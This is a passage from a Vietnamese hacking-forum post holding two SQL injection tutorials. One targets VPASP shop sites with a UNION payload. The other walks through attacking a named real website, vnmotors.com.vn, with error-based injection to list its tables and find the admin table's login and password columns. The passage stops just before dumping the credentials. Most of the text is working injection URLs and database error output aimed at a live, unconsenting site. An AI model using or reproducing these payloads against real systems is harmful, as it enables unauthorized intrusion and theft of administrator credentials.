. thấy cái gì chưa Microsoft Access Driver <== nó đây hix ko dùng được convert thì lại phải dùng union ! lưu ý ở đây ta phải thêm số 01 ở sau ID của shop ví dụ shopdisplayproducts.asp?id=1thì ta phải thêm shopdisplayproducts.asp?id=101%20union đây là lệnh truy vấn : Trích: 01%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 ,47%20from%20tbluser%27where%201=1 các số 1,2,3,4 thì mình ko giải thích URL example: Trích: http://www.site.com/dir/shopdisplayp 7where%201=1 sơ lược vậy là xong ! ^_^ cơ bản là cách hack shop VPASP access mà mình thấy nhiều tut của các bậc đàn anh đi trước chưa hưỡng dẫn về loại này ! từ đây các bạn có thể nghiên cứu tiếp hack 2 pass cũng giống như SQL injetion 2 pass VPASP thôi chúc các bạn có thêm những kiến thức bổ ích manhkenh ! buihuymanh (vniss) Hack website vnmotors.com.vn qua lỗi SQL Injection Bài này lâu rồi nhưng chắc có ích cho newbie Cách đây khoản 2 tháng mình đã phát hiện trang này bị dính SQl injection ., Nhưng đến hôm nay Buồn quá Lượn đi lượn lại thì Trang này vẫn chưa fix I-) -Vào http://vnmotors.com.vn/ lượn tới lượn lui rồi vào tiếp http://vnmotors.com.vn/motor/HotStuf asp?NewsID=41 Thử coi có bị dính Sql injection ko ?? http://vnmotors.com.vn/motor/HotStuf p?NewsID=41’ úi Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''. /motor/HotStuff/DisplayNews.asp, line 118 Dính SQL injection siềng luôn -Lấy table : vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41 and 1=convert(int,(select top 1 table_name from information_schema.tables)) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'REFERENTIAL_CONSTRAINTS' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line 118 okies ! Table đầu tiên là 'REFERENTIAL_CONSTRAINTS' , Tiếp tục lấy table vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41%20and%201=co nvert(int,(s elect%20top%201%20table_name%20from%20information_ schema.tables%20where%20table_name%20not%20in%20(' REFERENTIAL_CONSTRAINTS'))) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'BangPhu' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line 118 Có tiếp 1 table nữa là 'BangPhu' Tiếp tục nào : vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41%20and%201=co nvert(int,(s elect%20top%201%20table_name%20from%20information_ schema.tables%20where%20table_name%20not%20in%20(' REFERENTIAL_CONSTRAINTS','BangPhu'))) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'CongTacVien' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line Cứ tiếp tục làm như vậy ta sẽ thu thập được tất cả các table lấy 1 hồi thì đến 'NguoiQuanTri' ! Thấy cái này hay hay đây vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41%20and%201=co nvert(int,(s elect%20top%201%20table_name%20from%20information_ schema.tables%20where%20table_name%20not%20in%20(' REFERENTIAL_CONSTRAINTS','BangPhu','CongTacVien',' HitNumber','KhachBanXeCu','KhachBaoHiem','KhachHan g','KhachMuaPhuTung','KhachMuaXeCu','KhachMuaXeMoi ','NgayTemp'))) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NguoiQuanTri' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line 118 okies ! Bây giờ đến lược lấy column của table NguoiQuanTri vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41%20and%201=co nvert(int,(s elect%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name=('NguoiQuanTr i'))) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'LoginName' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line 118 Lấy tiếp column tiếp theo : vnmotors.com.vn/motor/HotStuff/DisplayNews.asp?NewsID=41%20and%201=co nvert(int,(s elect%20top%201%20column_name%20from%20information _schema.columns%20where%20table_name=('NguoiQuanTr i')%20and%20column_name%20not%20in%20('LoGinName') )) Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Password' to a column of data type int. /motor/HotStuff/DisplayNews.asp, line 118 okies ! Bạn cứ tiếp tục lấy như trên nếu muốn , còn tui thì tới đây là dừng rồi ! Bây giờ đến lúc phải lấy Username và PassWord của admin đây :